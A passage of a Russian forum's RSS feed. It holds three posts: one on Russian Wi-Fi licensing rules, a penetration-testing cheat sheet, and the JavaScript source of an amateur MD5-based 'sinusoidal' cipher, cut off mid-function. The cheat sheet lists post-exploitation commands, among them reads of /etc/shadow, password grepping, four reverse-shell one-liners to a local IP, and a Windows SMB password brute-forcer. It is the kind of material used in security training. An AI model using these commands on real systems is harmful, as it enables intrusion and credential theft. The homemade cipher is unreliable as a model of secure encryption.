			<description>&lt;p&gt;&lt;a href=&quot;https://www.google.ru/search?q=%D0%AE%D1%80%D0%B8%D0%B4%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%B8%D0%B9%20%D1%81%D1%82%D0%B0%D1%82%D1%83%D1%81%20Wi-Fi%20%D1%80%D0%B0%D0%B7%D0%BB%D0%B8%D1%87%D0%B5%D0%BD%20%D0%B2%20%D1%80%D0%B0%D0%B7%D0%BD%D1%8B%D1%85%20%D1%81%D1%82%D1%80%D0%B0%D0%BD%D0%B0%D1%85&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Юридический статус Wi-Fi различен в разных странах&lt;/a&gt;&lt;/p&gt;&lt;div class=&quot;quote-box quote-main&quot;&gt;&lt;blockquote&gt;&lt;p&gt;Россия&lt;/p&gt;
						&lt;p&gt;Разрешение на использование частот&lt;/p&gt;
						&lt;p&gt;В России, в соответствии с решениями Государственной комиссии по радиочастотам (ГКРЧ) от 7 мая 2007 г. № 07-20-03-001 «О выделении полос радиочастот устройствам малого радиуса действия» и от 20 декабря 2011 г. № 11-13-07-1, использование Wi-Fi без получения частного разрешения на использование частот возможно для организации сети внутри зданий, закрытых складских помещений и производственных территорий в полосах 2400—2483,5 МГц (стандарты 802.11b и 802.11g; каналы 1—13) и 5150-5350 МГц (802.11a и 802.11n; каналы 34-64). Для легального использования внеофисной беспроводной сети Wi-Fi (например, радиоканала между двумя соседними домами) необходимо получение разрешения на использование частот (как в полосе 2,4 ГГц, так и 5 ГГц) на основании заключения экспертизы о возможности использования заявленных РЭС и их электромагнитной совместимости (ЭМС) с действующими и планируемыми для использования РЭС.&lt;br /&gt;Регистрация оборудования&lt;/p&gt;
						&lt;p&gt;Радиоэлектронные средства подлежат регистрации в Роскомнадзоре в соответствии с установленным порядком . &lt;strong&gt;В соответствии c Постановлением Правительства Российской Федерации от 13 октября 2011 г. № 837 «О внесении изменений в Постановление Правительства Российской Федерации от 12 октября 2004 г. № 539» &lt;span style=&quot;color: blue&quot;&gt;не подлежат регистрации&lt;/span&gt;, в частности, (из п. 13, 23, 24 приложения):&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Пользовательское (оконечное) оборудование передающее, включающее в себя приемное устройство, малого радиуса действия стандартов IEEE 802.11, IEEE 802.11.b, IEEE 802.11.g, IEEE 802.11.n (Wi-Fi), работающее в полосе радиочастот 2400—2483,5 МГц, с допустимой мощностью излучения передатчика не более 100 мВт, в том числе встроенное либо входящее в состав других устройств;&lt;br /&gt;&amp;#160; &amp;#160; Пользовательское (оконечное) оборудование передающее, включающее в себя приемное устройство, малого радиуса действия стандартов IEEE 802.11а, IEEE 802.11.n (Wi-Fi), работающее в полосах радиочастот 5150 — 5350 МГц и 5650 — 6425 МГц, с допустимой мощностью излучения передатчика не более 100 мВт, в том числе встроенное либо входящее в состав других устройств;&lt;br /&gt;&amp;#160; &amp;#160; Устройства малого радиуса действия, используемые внутри закрытых помещений, в полосе радиочастот 5150 — 5250 МГц с максимальной эквивалентной изотропно излучаемой мощностью передатчика не более 200 мВт;&lt;br /&gt;&amp;#160; &amp;#160; Устройства малого радиуса действия в сетях беспроводной передачи данных внутри закрытых помещений в полосе радиочастот 2400—2483,5 МГц с максимальной эквивалентной изотропно излучаемой мощностью передатчика не более 100 мВт при использовании псевдослучайной перестройки рабочей частоты.&lt;/strong&gt;&lt;/p&gt;
						&lt;p&gt;Ответственность&lt;/p&gt;
						&lt;p&gt;За нарушение порядка использования радиоэлектронных средств предусматривается ответственность по статьям 13.3 и 13.4 Кодекса Российской Федерации об административных правонарушениях (КоАП РФ). Так, в июле 2006 года несколько компаний в Ростове-на-Дону были оштрафованы за эксплуатацию открытых сетей Wi-Fi (хот-спотов). Федеральная служба по надзору в сфере массовых коммуникаций, связи и охраны культурного наследия издало новое разъяснение использования и регистрации всех устройств, использующих Wi-Fi. Позднее оказалось, что существует комментарий Россвязьохранкультуры, который частично опровергает недоразумения, развитые сетевыми СМИ.&lt;/p&gt;&lt;/blockquote&gt;&lt;/div&gt;</description>
			<author>mybb@mybb.ru (Владимир Ильич)</author>
			<pubDate>Sun, 20 Jul 2014 08:43:54 +0400</pubDate>
			<guid>http://expertiza.mybb.ru/viewtopic.php?pid=104#p104</guid>
		</item>
		<item>
			<title>Penetration test. PenTest. Тестирование на проникновение</title>
			<link>http://expertiza.mybb.ru/viewtopic.php?pid=103#p103</link>
			<description>&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Исследование системы после проникновения (постэксплуатация)&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Разведка --&amp;gt; Сканирование --&amp;gt; Эксплуатация --&amp;gt; Постэксплуатация&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Постэксплуатация на примере debian и centos&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Команды для debian&lt;/p&gt;
						&lt;p&gt;cat /etc/issue какой дистрибутив используется&lt;br /&gt;cat /etc/*release&lt;br /&gt;lsb_release -A&lt;br /&gt;cat /proc/version информация по ядру&lt;br /&gt;uname -A выведет всё что может&lt;br /&gt;dmesg|grep Linux&amp;#160; грепаем информацию из загрузки системы&lt;br /&gt;ls /boot/ | grep vmlinuz-&lt;br /&gt;env&amp;#160; &amp;#160;посмотреть все переменные окружения для текущего пользователя&lt;br /&gt;lpstat -a&amp;#160; &amp;#160;принтеры подключенные&lt;br /&gt;ps aux&amp;#160; &amp;#160;выведет все запущенные процессы&lt;br /&gt;ps -ef&amp;#160; аналогичный вывод с некоторыми отличиями&lt;br /&gt;top&amp;#160; &amp;#160;мониторинг процессов&lt;br /&gt;htop&amp;#160; &amp;#160;продвинутый вариант top&lt;br /&gt;ps aux | grep root процессы запущенные от рута&lt;br /&gt;dpkg -l&amp;#160; &amp;#160;установленные пакеты&lt;br /&gt;grep -i pass /var/www/joomla/configuration.php&amp;#160; &amp;#160; Параметр -i поиск без учёта регистра&lt;br /&gt;hostname&amp;#160; покажет домен&lt;br /&gt;hostname -f&amp;#160; &amp;#160;покажет поддомен&lt;br /&gt;ip addr show&lt;br /&gt;ip ro show&amp;#160; показать табл маршрутизации&lt;br /&gt;ifconfig -a&amp;#160; &amp;#160;показать ВСЕ сетевые интерфейсы, даже выключенные&lt;br /&gt;route -n&amp;#160; &amp;#160; показать табл маршрутизации&lt;br /&gt;netstat -antup&amp;#160; &amp;#160; &lt;br /&gt;netstat -lntup&amp;#160; &amp;#160; все процессы, слушающие сеть. лишние не выводит&lt;br /&gt;chkconfig --list список всех служб&lt;br /&gt;cat /etc/resolv.conf&amp;#160; &amp;#160; список ДНС-серверов&lt;br /&gt;hostname&amp;#160; &amp;#160; &amp;#160; &amp;#160; первая часть доменного имени&lt;br /&gt;dnsdomainname&amp;#160; &amp;#160; вторая часть доменного имени&lt;br /&gt;cat /etc/passwd&lt;br /&gt;cat /etc/shadow&amp;#160; &amp;#160; hex паролей&lt;br /&gt;find / -perm -u=s -type f 2&amp;gt;/dev/null&amp;#160; &amp;#160; &amp;#160;ищем программы с суид-битом (s-бит)&lt;br /&gt;find / -perm -o+w -type d 2&amp;gt;/dev/null&amp;#160; &amp;#160; &amp;#160;ищем каталоги расшаренные для записи&lt;/p&gt;
						&lt;p&gt;Команды для centos&lt;/p&gt;
						&lt;p&gt;cat /etc/redhat_release&amp;#160; версия ос&lt;br /&gt;rpm -q kernel&amp;#160; информация о ядре&lt;br /&gt;rpm -qa установленные пакеты&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;Прослушивание сетевого интерфейса (сниффинг)&lt;/p&gt;
						&lt;p&gt;См. информацию по использованию утилиты tcpdump&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;Бекдоры, реверс shell. Проброс терминалов&lt;/p&gt;
						&lt;p&gt;nc (netcat)&lt;/p&gt;
						&lt;p&gt;1 вариант&lt;br /&gt;nc 192.168.242.137 8080 -e /bin/bash&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;проброс терминала&lt;br /&gt;парамет -e выполнение команд есть не во всех версиях nc&lt;/p&gt;
						&lt;p&gt;nc -nvv -l 8080&amp;#160; &amp;#160;прослушивание&lt;/p&gt;
						&lt;p&gt;2 вариант&lt;br /&gt;mknod backpipe p&lt;br /&gt;nc 192.168.242.137 8080 &amp;lt;backpipe&lt;br /&gt;/bin/bash 1&amp;gt;backpipe&lt;/p&gt;
						&lt;p&gt;3 вариант&lt;br /&gt;/bin/bash -i &amp;gt;/dev/tcp/192.168.242.137/8080 0&amp;lt;&amp;amp;1 2&amp;gt;&amp;amp;1&lt;br /&gt;Здесь 0-stdin, 1-stdout&lt;/p&gt;
						&lt;p&gt;4 вариант&lt;br /&gt;mknod backpipe p &amp;amp;&amp;amp; telnet 192.168.242.137 8080 0&amp;lt;backpipe |/bin/bash&lt;/p&gt;
						&lt;p&gt;См. также wget, curl&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Исследование Windows&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;whoami&lt;br /&gt;ver&lt;br /&gt;systeminfo&lt;br /&gt;set&lt;br /&gt;hastname&lt;br /&gt;ipconfig&lt;br /&gt;netstat -an&lt;br /&gt;netstat -an|findstr 192&lt;br /&gt;netstat -nabo&lt;br /&gt;netstat -r&lt;br /&gt;route print&lt;br /&gt;net start&lt;br /&gt;netsh&amp;#160; &amp;#160; диалог для настройки сетевых параметров&lt;br /&gt;wmic bios&lt;br /&gt;wmic os&lt;br /&gt;tasklist&lt;br /&gt;taskkill&lt;/p&gt;
						&lt;p&gt;Пропинговка локальной сети&lt;br /&gt;for /L %i in (1,1,254) do @ping -n1 192.168.242.%i | find &amp;quot;TTL&amp;quot;&lt;/p&gt;
						&lt;p&gt;Брутфорсник&lt;br /&gt;for /P %i in (password.txt) do @echo %i &amp;amp; net use \\192.168.242.10 %i /u:USERNAME 2&amp;gt;null &amp;amp;&amp;amp; pause&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Владимир Ильич)</author>
			<pubDate>Fri, 27 Jun 2014 10:05:19 +0400</pubDate>
			<guid>http://expertiza.mybb.ru/viewtopic.php?pid=103#p103</guid>
		</item>
		<item>
			<title>Алгоритм синусоидального шифрования Yozhix-6969</title>
			<link>http://expertiza.mybb.ru/viewtopic.php?pid=102#p102</link>
			<description>&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Код системы Yozhix-6969&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 35em&quot;&gt;&lt;pre&gt;&amp;lt;table style=&amp;quot;width:100%;height:100%&amp;quot;&amp;gt;
  &amp;lt;tr&amp;gt;
    &amp;lt;td colspan=&amp;quot;2&amp;quot;&amp;gt;
      &amp;lt;table style=&amp;quot;width:100%&amp;quot;&amp;gt;
        &amp;lt;tr&amp;gt;
          &amp;lt;td&amp;gt;&amp;lt;input type=&amp;quot;button&amp;quot; value=&amp;quot;Зашифровать&amp;quot; title=&amp;quot;Зашифровать исходный текст&amp;quot; onClick=&amp;quot;perePro1()&amp;quot;&amp;gt;&amp;lt;/td&amp;gt;
          &amp;lt;td style=&amp;quot;width:25%;text-align:center&amp;quot;&amp;gt;Исходный текст&amp;lt;/td&amp;gt;
          &amp;lt;td style=&amp;quot;width:50%;text-align:center&amp;quot;&amp;gt;
            &amp;lt;nobr&amp;gt;Ключ &amp;lt;input id=&amp;quot;key&amp;quot; type=&amp;quot;password&amp;quot; size=&amp;quot;13&amp;quot; title=&amp;quot;Ключ шифрования (пароль, секретное слово)&amp;quot;&amp;gt;&amp;lt;/nobr&amp;gt;
            &amp;lt;nobr&amp;gt;повтор &amp;lt;input id=&amp;quot;key2&amp;quot; type=&amp;quot;password&amp;quot; size=&amp;quot;13&amp;quot; title=&amp;quot;Повтор ключа для избежания случайных ошибок&amp;quot;&amp;gt;&amp;lt;/nobr&amp;gt;
          &amp;lt;/td&amp;gt;
          &amp;lt;td style=&amp;quot;width:25%;text-align:center&amp;quot;&amp;gt;Зашифрованный текст&amp;lt;/td&amp;gt;
          &amp;lt;td&amp;gt;&amp;lt;input type=&amp;quot;button&amp;quot; value=&amp;quot;Расшифровать&amp;quot; title=&amp;quot;Расшифровать зашифрованный текст&amp;quot; onClick=&amp;quot;perePro2()&amp;quot;&amp;gt;&amp;lt;/td&amp;gt;
        &amp;lt;/tr&amp;gt;
      &amp;lt;/table&amp;gt;
    &amp;lt;/td&amp;gt;
  &amp;lt;/tr&amp;gt;
  &amp;lt;tr style=&amp;quot;height:100%&amp;quot;&amp;gt;
    &amp;lt;td style=&amp;quot;width:50%&amp;quot;&amp;gt;
      &amp;lt;textarea id=&amp;quot;text1&amp;quot; style=&amp;quot;width:100%;height:100%;resize:none&amp;quot; title=&amp;quot;Исходный текст&amp;quot;&amp;gt;
Мы любим всё — и жар холодных числ,
И дар божественных видений
Нам внятно всё — и острый галльский смысл,
И сумрачный германский гений…
(«Скифы» А. Блок)
      &amp;lt;/textarea&amp;gt;
    &amp;lt;/td&amp;gt;
    &amp;lt;td&amp;gt;
      &amp;lt;textarea id=&amp;quot;text2&amp;quot; style=&amp;quot;width:100%;height:100%;resize:none&amp;quot; title=&amp;quot;Зашифрованный текст&amp;quot;&amp;gt;
      &amp;lt;/textarea&amp;gt;
    &amp;lt;/td&amp;gt;
  &amp;lt;/tr&amp;gt;

&amp;lt;/table&amp;gt;


&amp;lt;div id=&amp;quot;panel&amp;quot; style=&amp;quot;position:absolute;width:369px;left:3px;top:69px;
  background-color:#ccc;border-style:solid;border-width:1;border-color:#000;
  padding:3px&amp;quot; 
  onMouseOver=&amp;quot;openPanel()&amp;quot;
  onMouseOut=&amp;quot;closePanel()&amp;quot;&amp;gt;
  Разбить зашифрованный текст на строки&amp;lt;br&amp;gt;
  &amp;lt;input type=&amp;quot;button&amp;quot; value=&amp;quot;по 32 симв.&amp;quot; onClick=&amp;quot;razbivka(32)&amp;quot;&amp;gt;
  &amp;lt;input type=&amp;quot;button&amp;quot; value=&amp;quot;по 64 симв.&amp;quot; onClick=&amp;quot;razbivka(64)&amp;quot;&amp;gt;
  &amp;lt;input type=&amp;quot;button&amp;quot; value=&amp;quot;по 128 симв.&amp;quot; onClick=&amp;quot;razbivka(128)&amp;quot;&amp;gt;
  &amp;lt;br&amp;gt;
  &amp;lt;input type=&amp;quot;button&amp;quot; value=&amp;quot;Произвольное разбиение&amp;quot; onClick=&amp;quot;razbivka(document.getElementById(&#039;dlstr&#039;).value)&amp;quot;&amp;gt;
  по &amp;lt;input id=&amp;quot;dlstr&amp;quot; type=&amp;quot;text&amp;quot; size=&amp;quot;4&amp;quot; value=&amp;quot;256&amp;quot;&amp;gt; симв.
  &amp;lt;br&amp;gt;
  &amp;lt;input type=&amp;quot;button&amp;quot; value=&amp;quot;Без разбиения&amp;quot; onClick=&amp;quot;razbivka(0)&amp;quot;&amp;gt;  
  &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;
  &amp;lt;input type=&amp;quot;button&amp;quot; value=&amp;quot;ОЧИСТИТЬ ВСЕ ПОЛЯ&amp;quot; onClick=&amp;quot;cleaner()&amp;quot; style=&amp;quot;width:100%;height:69px&amp;quot;&amp;gt;
&amp;lt;/div&amp;gt;


&amp;lt;table id=&amp;quot;NoJS&amp;quot; style=&amp;quot;position:absolute;left:0;top:0;width:100%;height:100%&amp;quot;&amp;gt;&amp;lt;tr&amp;gt;
  &amp;lt;td style=&amp;quot;background-color:#aaa;text-align:center&amp;quot;&amp;gt;
Ваш браузер не поддерживает Javascript, либо эта функция отключена. 
Без нее работа программы невозможна.
Обновите браузер или включите Javascript в его настройках.
В случае затруднений обратитесь к опытному пользователю за помощью.
  &amp;lt;/td&amp;gt;
&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;

&amp;lt;/div&amp;gt;













&amp;lt;script language=&amp;quot;javascript&amp;quot; type=&amp;quot;text/javascript&amp;quot;&amp;gt;

/*
 * A JavaScript implementation of the RSA Data Security, Inc. MD5 Message
 * Digest Algorithm, as defined in RFC 1321.
 * Copyright (C) Paul Johnston 1999 - 2000.
 * Updated by Greg Holt 2000 - 2001.
 * See http://pajhome.org.uk/site/legal.html for details.
 */

/*
 * Convert a 32-bit number to a hex string with ls-byte first
 */
var hex_chr = &amp;quot;0123456789abcdef&amp;quot;;
function rhex(num)
{
  str = &amp;quot;&amp;quot;;
  for(j = 0; j &amp;lt;= 3; j++)
    str += hex_chr.charAt((num &amp;gt;&amp;gt; (j * 8 + 4)) &amp;amp; 0x0F) +
           hex_chr.charAt((num &amp;gt;&amp;gt; (j * 8)) &amp;amp; 0x0F);
  return str;
}

/*
 * Convert a string to a sequence of 16-word blocks, stored as an array.
 * Append padding bits and the length, as described in the MD5 standard.
 */
function str2blks_MD5(str)
{
  nblk = ((str.length + 8) &amp;gt;&amp;gt; 6) + 1;
  blks = new Array(nblk * 16);
  for(i = 0; i &amp;lt; nblk * 16; i++) blks[i] = 0;
  for(i = 0; i &amp;lt; str.length; i++)
    blks[i &amp;gt;&amp;gt; 2] |= str.charCodeAt(i) &amp;lt;&amp;lt; ((i % 4) * 8);
  blks[i &amp;gt;&amp;gt; 2] |= 0x80 &amp;lt;&amp;lt; ((i % 4) * 8);
  blks[nblk * 16 - 2] = str.length * 8;
  return blks;
}

/*
 * Add integers, wrapping at 2^32. This uses 16-bit operations internally 
 * to work around bugs in some JS interpreters.
 */
function add(x, y)
{
  var lsw = (x &amp;amp; 0xFFFF) + (y &amp;amp; 0xFFFF);
  var msw = (x &amp;gt;&amp;gt; 16) + (y &amp;gt;&amp;gt; 16) + (lsw &amp;gt;&amp;gt; 16);
  return (msw &amp;lt;&amp;lt; 16) | (lsw &amp;amp; 0xFFFF);
}

/*
 * Bitwise rotate a 32-bit number to the left
 */
function rol(num, cnt)
{
  return (num &amp;lt;&amp;lt; cnt) | (num &amp;gt;&amp;gt;&amp;gt; (32 - cnt));
}

/*
 * These functions implement the basic operation for each round of the
 * algorithm.
 */
function cmn(q, a, b, x, s, t)
{
  return add(rol(add(add(a, q), add(x, t)), s), b);
}
function ff(a, b, c, d, x, s, t)
{
  return cmn((b &amp;amp; c) | ((~b) &amp;amp; d), a, b, x, s, t);
}
function gg(a, b, c, d, x, s, t)
{
  return cmn((b &amp;amp; d) | (c &amp;amp; (~d)), a, b, x, s, t);
}
function hh(a, b, c, d, x, s, t)
{
  return cmn(b ^ c ^ d, a, b, x, s, t);
}
function ii(a, b, c, d, x, s, t)
{
  return cmn(c ^ (b | (~d)), a, b, x, s, t);
}

/*
 * Take a string and return the hex representation of its MD5.
 */
function calcMD5(str)
{
  x = str2blks_MD5(str);
  a =  1732584193;
  b = -271733879;
  c = -1732584194;
  d =  271733878;

  for(i = 0; i &amp;lt; x.length; i += 16)
  {
    olda = a;
    oldb = b;
    oldc = c;
    oldd = d;

    a = ff(a, b, c, d, x[i+ 0], 7 , -680876936);
    d = ff(d, a, b, c, x[i+ 1], 12, -389564586);
    c = ff(c, d, a, b, x[i+ 2], 17,  606105819);
    b = ff(b, c, d, a, x[i+ 3], 22, -1044525330);
    a = ff(a, b, c, d, x[i+ 4], 7 , -176418897);
    d = ff(d, a, b, c, x[i+ 5], 12,  1200080426);
    c = ff(c, d, a, b, x[i+ 6], 17, -1473231341);
    b = ff(b, c, d, a, x[i+ 7], 22, -45705983);
    a = ff(a, b, c, d, x[i+ 8], 7 ,  1770035416);
    d = ff(d, a, b, c, x[i+ 9], 12, -1958414417);
    c = ff(c, d, a, b, x[i+10], 17, -42063);
    b = ff(b, c, d, a, x[i+11], 22, -1990404162);
    a = ff(a, b, c, d, x[i+12], 7 ,  1804603682);
    d = ff(d, a, b, c, x[i+13], 12, -40341101);
    c = ff(c, d, a, b, x[i+14], 17, -1502002290);
    b = ff(b, c, d, a, x[i+15], 22,  1236535329);    

    a = gg(a, b, c, d, x[i+ 1], 5 , -165796510);
    d = gg(d, a, b, c, x[i+ 6], 9 , -1069501632);
    c = gg(c, d, a, b, x[i+11], 14,  643717713);
    b = gg(b, c, d, a, x[i+ 0], 20, -373897302);
    a = gg(a, b, c, d, x[i+ 5], 5 , -701558691);
    d = gg(d, a, b, c, x[i+10], 9 ,  38016083);
    c = gg(c, d, a, b, x[i+15], 14, -660478335);
    b = gg(b, c, d, a, x[i+ 4], 20, -405537848);
    a = gg(a, b, c, d, x[i+ 9], 5 ,  568446438);
    d = gg(d, a, b, c, x[i+14], 9 , -1019803690);
    c = gg(c, d, a, b, x[i+ 3], 14, -187363961);
    b = gg(b, c, d, a, x[i+ 8], 20,  1163531501);
    a = gg(a, b, c, d, x[i+13], 5 , -1444681467);
    d = gg(d, a, b, c, x[i+ 2], 9 , -51403784);
    c = gg(c, d, a, b, x[i+ 7], 14,  1735328473);
    b = gg(b, c, d, a, x[i+12], 20, -1926607734);
    
    a = hh(a, b, c, d, x[i+ 5], 4 , -378558);
    d = hh(d, a, b, c, x[i+ 8], 11, -2022574463);
    c = hh(c, d, a, b, x[i+11], 16,  1839030562);
    b = hh(b, c, d, a, x[i+14], 23, -35309556);
    a = hh(a, b, c, d, x[i+ 1], 4 , -1530992060);
    d = hh(d, a, b, c, x[i+ 4], 11,  1272893353);
    c = hh(c, d, a, b, x[i+ 7], 16, -155497632);
    b = hh(b, c, d, a, x[i+10], 23, -1094730640);
    a = hh(a, b, c, d, x[i+13], 4 ,  681279174);
    d = hh(d, a, b, c, x[i+ 0], 11, -358537222);
    c = hh(c, d, a, b, x[i+ 3], 16, -722521979);
    b = hh(b, c, d, a, x[i+ 6], 23,  76029189);
    a = hh(a, b, c, d, x[i+ 9], 4 , -640364487);
    d = hh(d, a, b, c, x[i+12], 11, -421815835);
    c = hh(c, d, a, b, x[i+15], 16,  530742520);
    b = hh(b, c, d, a, x[i+ 2], 23, -995338651);

    a = ii(a, b, c, d, x[i+ 0], 6 , -198630844);
    d = ii(d, a, b, c, x[i+ 7], 10,  1126891415);
    c = ii(c, d, a, b, x[i+14], 15, -1416354905);
    b = ii(b, c, d, a, x[i+ 5], 21, -57434055);
    a = ii(a, b, c, d, x[i+12], 6 ,  1700485571);
    d = ii(d, a, b, c, x[i+ 3], 10, -1894986606);
    c = ii(c, d, a, b, x[i+10], 15, -1051523);
    b = ii(b, c, d, a, x[i+ 1], 21, -2054922799);
    a = ii(a, b, c, d, x[i+ 8], 6 ,  1873313359);
    d = ii(d, a, b, c, x[i+15], 10, -30611744);
    c = ii(c, d, a, b, x[i+ 6], 15, -1560198380);
    b = ii(b, c, d, a, x[i+13], 21,  1309151649);
    a = ii(a, b, c, d, x[i+ 4], 6 , -145523070);
    d = ii(d, a, b, c, x[i+11], 10, -1120210379);
    c = ii(c, d, a, b, x[i+ 2], 15,  718787259);
    b = ii(b, c, d, a, x[i+ 9], 21, -343485551);

    a = add(a, olda);
    b = add(b, oldb);
    c = add(c, oldc);
    d = add(d, oldd);
  }
  return rhex(a) + rhex(b) + rhex(c) + rhex(d);
}




/*
Функция IntToHex возвращает шестнадцатеричные представления целых чисел. Такая стандартная функция есть в языке Delphi. Теперь я написал её аналог и для Javascript. Функция имеет два входных параметра: chi - целое положительное число, kol - длина выходной строки.
Пример использования
IntToHex(234,4) возвращает &#039;00ea&#039;
IntToHex(1234567,10) возвращает &#039;000012d687&#039;
IntToHex(234,0) возвращает &#039;ea&#039;
IntToHex(1234567,0) возвращает &#039;12d687&#039;
*/
function IntToHex(chi,kol){
  var chi2=Math.floor(Math.abs(chi));
  var mn=1;
  var k=1;
  for(var i=chi2;i&amp;gt;15;i=i/16){mn=mn*16;k=k+1;}
  var he=&#039;&#039;;
  var j=&#039;(c)arraylove.narod.ru,2013&#039;;
  for(i=1;i&amp;lt;=k;i++){
    j=Math.floor(chi2/mn);
    chi2=chi2-(mn*j);
    switch (j) {
      case 10: he=he+&#039;a&#039;; break;
      case 11: he=he+&#039;b&#039;; break;
      case 12: he=he+&#039;c&#039;; break;
      case 13: he=he+&#039;d&#039;; break;
      case 14: he=he+&#039;e&#039;; break;
      case 15: he=he+&#039;f&#039;; break;
      default: he=he+j; break;
    }
    mn=mn/16; 
  }
  if(kol!=0){
    for(i=1;i&amp;lt;=kol;i++){he=&#039;0&#039;+he;}
    he=he.substr(-kol);
  }
  return he;
}




/*
Обратная функция для перевода шестнадцатеричной строковой записи целого числа в числовой формат.
Пример использования
HexToInt(&#039;00eA&#039;) возвращает 234
HexToInt(&#039;000012d687&#039;) возвращает 1234567
HexToInt(&#039;FFff&#039;) возвращает 65535
*/
function HexToInt(he){
  var he2=he.toLowerCase();
  he2=he2.replace(/[^0-9a-f]/g,&#039;&#039;);
  var le=he2.length;
  var mn=1;
  var su=0;
  var j=le;
  var ch=&#039;(c)arraylove.narod.ru,2013&#039;;
  for(var i=0;i&amp;lt;le;i++){
    j=j-1;
    ch=he2.substr(j,1);
    switch (ch) {
      case &#039;a&#039;: su=su+(mn*10); break;
      case &#039;b&#039;: su=su+(mn*11); break;
      case &#039;c&#039;: su=su+(mn*12); break;
      case &#039;d&#039;: su=su+(mn*13); break;
      case &#039;e&#039;: su=su+(mn*14); break;
      case &#039;f&#039;: su=su+(mn*15); break;
      default: su=su+(mn*ch); break;
    }
    mn=mn*16;
  }
  return su;
}





/*
  
  Программа синусоидального шифрования сообщений.
  Посвящается всем спецслужбам мира. ;)

*/

with(document.getElementById(&#039;NoJS&#039;)){
  style.width=&#039;69px&#039;; style.left=&#039;-999px&#039;; 
}

document.body.style.overflow=&#039;hidden&#039;;

function closePanel(){
  var width = window.innerWidth || (document.documentElement &amp;amp;&amp;amp; document.documentElement.clientWidth) || document.body.clientWidth;
  le=width-9;
  le=le+&#039;px&#039;;
  document.getElementById(&#039;panel&#039;).style.left=le;
}

closePanel();

window.onresize=closePanel;

function openPanel(){
  var width = window.innerWidth || (document.documentElement &amp;amp;&amp;amp; document.documentElement.clientWidth) || document.body.clientWidth;
  le=width-369;
  le=le+&#039;px&#039;;
  document.getElementById(&#039;panel&#039;).style.left=le;
}

function razbivka(m){
  var n=&#039;arraylove.narod.ru&#039;+m;
  n=n.replace(/[^0-9]/g,&#039;&#039;);
  n=0+n;
  n=1*n;
  var st=document.getElementById(&#039;text2&#039;).value;
  st=st.replace(/[^0-9a-f]/g,&#039;&#039;);
  var L=st.length;
  var st2=&#039;(c)arraylove.narod.ru,2013&#039;;
  if(n==0){
    st2=st;
  }else{
    st2=&#039;&#039;;
    var st3=&#039;(c)arraylove.narod.ru,2013&#039;;
    for(var i=0;i&amp;lt;L;i=i+n){
      st3=st.substr(i,n);
      st2=st2+&#039;\n&#039;+st3;
    }
    st2=st2.replace(/^\n/,&#039;&#039;);
  }
  document.getElementById(&#039;text2&#039;).value=st2; 
  closePanel();
}

function cleaner(){
  document.getElementById(&#039;text1&#039;).value=&#039;&#039;;
  document.getElementById(&#039;text2&#039;).value=&#039;&#039;;
  document.getElementById(&#039;key&#039;).value=&#039;&#039;;
  document.getElementById(&#039;key2&#039;).value=&#039;&#039;;
  document.getElementById(&#039;dlstr&#039;).value=&#039;256&#039;;
  closePanel();
}

function perePro1(){
  var st=document.getElementById(&#039;text1&#039;).value;
  document.getElementById(&#039;text2&#039;).value=&#039;&#039;;
  if(st!=&#039;&#039;){
    var key=document.getElementById(&#039;key&#039;).value;
    if(key==document.getElementById(&#039;key2&#039;).value){
      var st2=cipher69690(st,key);
      document.getElementById(&#039;text2&#039;).value=st2;
    }else{
      alert(&#039;Введенные ключи не совпадают!&#039;);
    }
  }else{
    alert(&#039;Не задан исходный текст.&#039;);
  }
}

function perePro2(){
  var st=document.getElementById(&#039;text2&#039;).value;
  document.getElementById(&#039;text1&#039;).value=&#039;&#039;;
  var key=document.getElementById(&#039;key&#039;).value;
  var st2=cipher6969(st,key);
  document.getElementById(&#039;text1&#039;).value=st2;
  if(st2==&#039;&#039;){alert(&#039;Введён неверный ключ или зашифрованный текст повреждён.&#039;);}
}

function cipher69690(st1,passwo){

  var kA = new Array ();
  var st2=calcMD5(passwo);
  kA[0]=HexToInt(st2.substring( 0, 4));
  kA[1]=HexToInt(st2.substring( 4, 8));
  kA[2]=HexToInt(st2.substring( 8,12));
  kA[3]=HexToInt(st2.substring(12,16));
  kA[4]=HexToInt(st2.substring(16,20));
  kA[5]=HexToInt(st2.substring(20,24));
  kA[6]=HexToInt(st2.substring(24,28));
  kA[7]=HexToInt(st2.substring(28,32));  

  var kB = new Array (
    69691, 69697, 86969, 116969,
    169691, 169693, 296969, 356969);

  var kC = new Array ();
  st2=calcMD5(st1);
  kC[0]=HexToInt(st2.substring( 0, 4));
  kC[1]=HexToInt(st2.substring( 4, 8));
  kC[2]=HexToInt(st2.substring( 8,12));
  kC[3]=HexToInt(st2.substring(12,16));
  kC[4]=HexToInt(st2.substring(16,20));
  kC[5]=HexToInt(st2.substring(20,24));
  kC[6]=HexToInt(st2.substring(24,28));
  kC[7]=HexToInt(st2.substring(28,32));

  var L1=st1.length;
  var plu=&#039;(c)arraylove.narod.ru,2013&#039;;
  var garmo=0;
  for(var i=0;i&amp;lt;L1;i++){
    garmo=
    kA[0]*Math.sin(kB[0]*i+kC[0])+
    kA[1]*Math.sin(kB[1]*i+kC[1])+
    kA[2]*Math.sin(kB[2]*i+kC[2])+
    kA[3]*Math.sin(kB[3]*i+kC[3])+
    kA[4]*Math.sin(kB[4]*i+kC[4])+
    kA[5]*Math.sin(kB[5]*i+kC[5])+
    kA[6]*Math.sin(kB[6]*i+kC[6])+
